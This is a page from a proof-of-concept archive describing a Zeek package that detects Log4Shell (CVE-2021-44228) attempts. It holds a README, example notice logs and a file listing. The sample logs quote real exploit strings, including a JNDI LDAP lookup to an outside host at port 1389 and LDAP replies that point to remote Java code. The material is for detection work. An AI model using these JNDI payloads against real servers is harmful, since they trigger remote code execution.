Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Log4j Exploit Detection Logic for Zeek
Readme
# CVE-2021-44228
A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J
(CVE-2021-44228) attempts.
- Detects payload contained in HTTP headers: See [Simplifying Detection of
Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for
details.
- [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when a Java file is
returned during an LDAP search. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for
details.
- Detects when second stage Java Class is downloaded, regardless of payload and first stage detection. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details.
## Installation
`$ zkg install cve-2021-44228`
Use against a pcap you already have:
`$ zeek -Cr scripts/__load__.zeek your.pcap`
If you install from a `git clone`'d version of the repository, note that it
defaults to the development branch. Install from `master` or a release for a
more stable version of the package.
## Options and notes:
- `CVE_2021_44228::log` determines if the `log4j` log is generated. Defaults to `T`.
- `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s so ignore. It is a `set[string]` so both IPs and domains can be ignored.
- `CVE_2021_44228::ignorable_orig_hosts` set of `addr`s from known benign scanners that can be ignored.
- `CVE_2021_44228::ignorable_resp_hosts` above but for `resp`s.
- `CVE_2021_44228::try_normalize` determines if normalizing the payload should be attempted. Defaults to `T`.
## Example Notices
This package generates three distinct notices:
1. `LOG4J_ATTEMPT_HEADER`
1. `LOG4J_LDAP_JAVA`
1. `LOG4J_JAVA_CLASS_DOWNLOAD`
`LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data. These are also logged to `log4j` if enabled.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
```
`LOG4J_LDAP_JAVA` detects LDAP downloading Java bytecode. In practice, we see
this happen infrequently enough that it makes for a good proxy detection for
possibly successful exploits.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-16-20-54-13
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-16-20-54-13
```
Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident
that Java downloads more Java. As above, this happens sufficiently rarely to be
a useful proxy detection.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open XXXX-XX-XX-XX-XX-XX
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
#close 2021-12-126-19-17-58
```
## Example Log (`log4j.log`)
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-14-11-50-29
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T
#close 2021-12-14-11-50-29
```
## References
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
1. https://corelight.com/blog/simplifying-detection-of-log4shell
File Snapshot
[4.0K] /data/pocs/6fe6a5fe26737b3ac84fd2b13a06cb8b723b4af2
├── [1.5K] LICENSE
├── [8.6K] README.md
├── [4.0K] scripts
│ ├── [3.4K] CVE_2021_44228_java_GET.zeek
│ ├── [ 11K] CVE_2021_44228.zeek
│ ├── [ 499] ldap_java.sig
│ ├── [ 84] __load__.zeek
│ └── [8.2K] tests.zeek
├── [4.0K] testing
│ ├── [4.0K] Baseline
│ │ ├── [4.0K] log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ │ └── [ 18K] notice.log
│ │ ├── [4.0K] log4j.ldap_java
│ │ │ ├── [2.2K] notice.log
│ │ │ └── [1.2K] signatures.log
│ │ ├── [4.0K] log4j.log4j-attack
│ │ │ └── [1.7K] notice.log
│ │ ├── [4.0K] log4j.log4j-dns_exfil
│ │ │ └── [1.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-log
│ │ │ ├── [ 613] log4j.log
│ │ │ └── [ 617] log4shell.log
│ │ ├── [4.0K] log4j.log4j-user_agent
│ │ │ └── [2.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-webapp
│ │ │ └── [2.2K] notice.log
│ │ ├── [4.0K] log4j.notice
│ │ │ ├── [1015] http.log
│ │ │ └── [1.3K] notice.log
│ │ └── [4.0K] log4j.unit
│ │ └── [1.7K] output
│ ├── [ 558] btest.cfg
│ ├── [4.0K] Files
│ │ └── [ 192] random.seed
│ ├── [4.0K] log4j
│ │ ├── [ 210] 2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ ├── [ 303] ignore-orig
│ │ ├── [ 301] ignore-resp
│ │ ├── [ 307] ignore-target
│ │ ├── [ 168] ldap_java.zeek
│ │ ├── [ 168] log4j-attack
│ │ ├── [ 171] log4j-dns_exfil
│ │ ├── [ 288] log4j-log
│ │ ├── [ 172] log4j-user_agent
│ │ ├── [ 168] log4j-webapp
│ │ ├── [ 235] notice
│ │ └── [ 154] unit
│ ├── [ 28] Makefile
│ ├── [4.0K] Scripts
│ │ ├── [ 383] diff-remove-timestamps
│ │ ├── [1.3K] get-zeek-env
│ │ └── [ 303] README
│ └── [4.0K] Traces
│ ├── [4.9M] 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap
│ ├── [ 11K] log4j-attack.pcap
│ ├── [4.0K] log4j-dns_exfil.pcap
│ ├── [ 41K] log4j-user_agent.pcap
│ ├── [ 41K] log4j-webapp.pcap
│ ├── [ 87] Readme
│ └── [1.8K] spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap
└── [ 342] zkg.meta
16 directories, 45 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →